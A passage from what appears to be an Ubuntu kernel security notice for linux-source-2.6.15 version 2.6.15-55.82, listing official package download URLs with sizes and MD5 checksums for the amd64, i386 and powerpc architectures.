b184441d2f44037554d037d217688393\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb\n      Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     2312 d464c76f98a4142add7a69aca1305739\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49160 a512718368004f81e83063ea8972c871\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    36776 fcb0833daefa645545a2451824094b21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   287606 f3cc835959f215c209dc5a825596849c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5:   872448 1a70a906bccd7642241535f79feddb57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb\n      Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   202666 71d8be83541874d6c675945838b9e223\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49294 e4a805200acaaea274e67995602294e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    35158 0869bee234a54b1afe362123606efe66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    33806 ebf707126fa6326899d648786afa8779\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38938 75eb074224a6373013e621cdd5931a51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb\n      Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53554 afc415fd0a28c363579986fc48464671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    98468 ddb974591a687460f50c26a2e2682593\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   299158 458051a07217501718f6e2a742bec0a3\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    51536 d2c7a02ac033097208c359312e95d246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2482 3c964c577c93d80cee55d06e78003951\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40906 84f84dc75718a347eb6623204cab6209\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29892 4a807f384985ae3376d509474716f13a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45054 a2373aac90339698b2cba11e43978565\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     1934 0887612df6acbc867949c33251427c00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2198 d38a4ec22579275ff2f48805be734356\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   161908 70564b18529d383509cb4c1d4898425a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a\n    